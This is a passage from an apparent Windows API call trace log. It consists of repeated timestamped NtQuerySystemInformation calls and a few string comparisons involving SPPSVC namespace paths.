ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.856] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0270.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0270.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0270.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0270.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x20, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0270.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x28, ResultLength=0x0) [0270.874] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0270.875] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0270.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0270.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0270.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 